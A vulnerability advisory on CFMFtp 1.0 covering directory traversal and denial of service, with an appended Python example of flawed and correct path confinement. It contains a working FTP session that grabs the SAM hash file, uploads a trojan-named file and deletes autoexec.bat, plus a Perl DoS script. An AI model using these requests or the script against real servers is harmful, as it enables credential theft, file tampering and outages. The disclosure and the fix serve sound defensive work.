Multiple vulnerabilities found in CFMFtp 1.0
CFPablo.Com, Inc (FTP Service)

Discovered by Dennis Rand

------------------------------------------------------------------------

-----[SUMMARY

"The world's only database driven FTP Server. Full FTP Server that allows
you the ability to run your users administration via a database, this is
a plus because if you run a 'DYNAMIC' website that has database
connection capabilities, you can allow your users via the web to
configure and maintain their accounts login and password information.
Unlike those other FTP servers out there."

A directory traversal vulnerability in the product allows remote
attackers to cause the server to traverse into directories that reside
outside the bounding FTP root directory. The FTPd is also vulnerable to a
DoS attack.

-----[DETAILS

Vulnerable systems:
Windows NT 4.0 and Windows 2000 Server, fully patched
 * CFMFtp 1.0

Immune systems:
 * None

CFMFtp version 1.0 fails to filter out "\.." and "/.." sequences in
specific command requests, allowing remote users to break out of the
restricted directories and gain read access to the system directory
structure; the directory structure outside the configured areas can be
discovered. It is also possible to send, receive and delete files from
outside the restricted areas. As the sample exploitation below
demonstrates, this means a Trojan can be placed on the server and files
can be deleted.

The server is also vulnerable to a DoS attack that drives the CPU usage
on the server to 100%. CPU usage returns to normal only when the FTPd is
killed manually on the server.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:

-------------------- DIRECTORY TRAVERSAL VULNERABILITY ---------------------------

To 192.168.1.199
Connected to 192.168.1.199.
220- CFM-Resources.Com FTPServ (1.0) - Welcome!
220 *************************************************
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
iissamples/
scripts/
wwwroot/
226 Listing complete.
ftp: 33 bytes received in 0,00Seconds 33000,00Kbytes/sec.
ftp> cd ..
550 Access denied
ftp> cd ...
550 Access denied
ftp> cd /
250 CWD command successful.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
iissamples/
scripts/
wwwroot/
226 Listing complete.
ftp: 33 bytes received in 0,00Seconds 33000,00Kbytes/sec.
ftp> cd \
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x 1 User Group         0 Dec 23 22:31 iissamples
drwxr-xr-x 1 User Group         0 Dec 23 23:16 scripts
drwxr-xr-x 1 User Group         0 Dec 23 22:31 wwwroot
226 Listing complete.
ftp: 201 bytes received in 0,01Seconds 20,10Kbytes/sec.
ftp> cd \..\..\
550 Access denied
ftp> cd /../../
550 Access denied
ftp> dir /../../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group       278 Jan 18 08:49 boot.ini
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group         0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group         0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group         0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group         0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group     26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group    156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group         0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 524288000 Jan 23 12:20 pagefile.sys
drwxr-xr-x 1 User Group         0 Jan 23 12:21 Program Files
drwxr-xr-x 1 User Group         0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group         0 Jan 23 12:21 TEMP
drwxr-xr-x 1 User Group         0 Jan 23 12:21 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,07Seconds 16,87Kbytes/sec.
ftp> dir \..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group       278 Jan 18 08:49 boot.ini
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group         0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group         0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group         0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group         0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group     26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group    156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group         0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 524288000 Jan 23 12:20 pagefile.sys
drwxr-xr-x 1 User Group         0 Jan 23 12:21 Program Files
drwxr-xr-x 1 User Group         0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group         0 Jan 23 12:21 TEMP
drwxr-xr-x 1 User Group         0 Jan 23 12:21 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,13Seconds 9,08Kbytes/sec.
ftp> get /../../winnt/repair/sam._
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp: 3196 bytes received in 0,00Seconds 3196000,00Kbytes/sec.
ftp> send eviltrojan.exe
eviltrojan.exe: File not found
ftp> send
Local file evil_trojan.exe
Remote file command.exe
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp: 5528745 bytes sent in 27,53Seconds 200,83Kbytes/sec.
ftp> delete \..\..\autoexec.bat
250 delete command successful.
ftp> dir /../../
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group       278 Jan 18 08:49 boot.ini
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group         0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group         0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group         0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group         0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group         0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group     26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group    156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group         0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 524288000 Jan 23 12:20 pagefile.sys
drwxr-xr-x 1 User Group         0 Jan 23 12:21 Program Files
drwxr-xr-x 1 User Group         0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group         0 Jan 23 12:21 TEMP
drwxr-xr-x 1 User Group         0 Jan 23 12:21 WINNT
226 Listing complete.
ftp: 1110 bytes received in 0,11Seconds 10,09Kbytes/sec.
ftp> bye
221 Goodbye.

-------------------- DoS Exploit code ---------------------------

#!/usr/bin/perl
#
# CFMFtp V1.0
# Dennis Rand
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
use strict;
use warnings;
use Net::FTP;

my $target = shift() || die "usage: target ip";
my $user   = "anonymous";
my $pass   = "anonymous";

system('cls');
print "CFMFtp V1.0 DoS attack\n";
print "Trying to connect to target system at: $target...\n";

# Net::FTP reports a failed connect in $@, not $!
my $ftp = Net::FTP->new($target, Debug => 0, Port => 21)
    || die "could not connect: $@";
$ftp->login($user, $pass) || die "could not login: ", $ftp->message;
$ftp->cwd("/");

print "Sending CRASH REQUEST...\n";
# single-quoted so the '@' characters are sent literally
$ftp->cwd('cd @/..@/..');
$ftp->quit;

-------------------- DoS Exploit code ---------------------------

-----[DETECTION

CFMFtp 1.0 is vulnerable to the above-described attacks. Earlier
versions may be susceptible as well.
To determine if a specific implementation is vulnerable, experiment by
following the above transcript.

-----[ADDITIONAL INFORMATION

The vulnerability was discovered by Dennis Rand.

-----[DISCLAIMER

The information in this bulletin is provided "AS IS" without warranty of
any kind. In no event shall we be liable for any damages whatsoever
including direct, indirect, incidental, consequential, loss of business
profits or special damages.
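The traversal described under DETAILS works because the ".." check is applied to CWD only, while LIST, RETR, STOR and DELE take their paths unfiltered and both "/" and "\" are accepted as separators. The following Python is an added example, not code from the advisory or from CFMFtp: `per_command_filter` is a hypothetical reconstruction of the flawed pattern the transcript implies, and `confine` is the canonicalising check a server should run on every path-taking command before touching the filesystem; `ROOT` is a constructed value.

```python
import ntpath

ROOT = r"C:\Inetpub"  # constructed FTP root for the example; not from the advisory


def per_command_filter(command, arg):
    """Hypothetical reconstruction of the flawed pattern the transcript implies:
    a substring check for ".." run by the CWD handler only, so LIST, RETR, STOR
    and DELE arguments such as "/../../" are passed through untouched."""
    if command == "CWD" and ".." in arg:
        return False
    return True


def confine(cwd, arg):
    """Resolve a client path against the virtual root "/" and map it to a real
    path under ROOT; raise ValueError if it would escape.

    "/" and "\\" both count as separators (the server accepted both), a relative
    path is joined to cwd, and ".." pops a segment stack; popping an empty stack
    means the client tried to climb above the root.  Segments that are all dots
    or end in a dot or space are refused because Win32 path normalisation
    rewrites such names, so the name checked would not be the name opened.
    """
    path = arg.replace("\\", "/")
    if not path.startswith("/"):
        path = cwd.rstrip("/") + "/" + path
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                raise ValueError("path escapes FTP root: %r" % arg)
            segments.pop()
            continue
        if seg.strip(". ") == "" or seg[-1] in ". " or ":" in seg or "\0" in seg:
            raise ValueError("unsafe path component: %r" % seg)
        segments.append(seg)
    return "/" + "/".join(segments), ntpath.join(ROOT, *segments)


def is_confined(cwd, arg):
    """True if confine() accepts the request, False if it refuses it."""
    try:
        confine(cwd, arg)
    except ValueError:
        return False
    return True
```

Run against the requests in the transcript, `per_command_filter` lets `dir /../../` and `delete \..\..\autoexec.bat` through while `confine` refuses them, and `cd ...` is refused by `confine` for the Win32 reason given in its docstring.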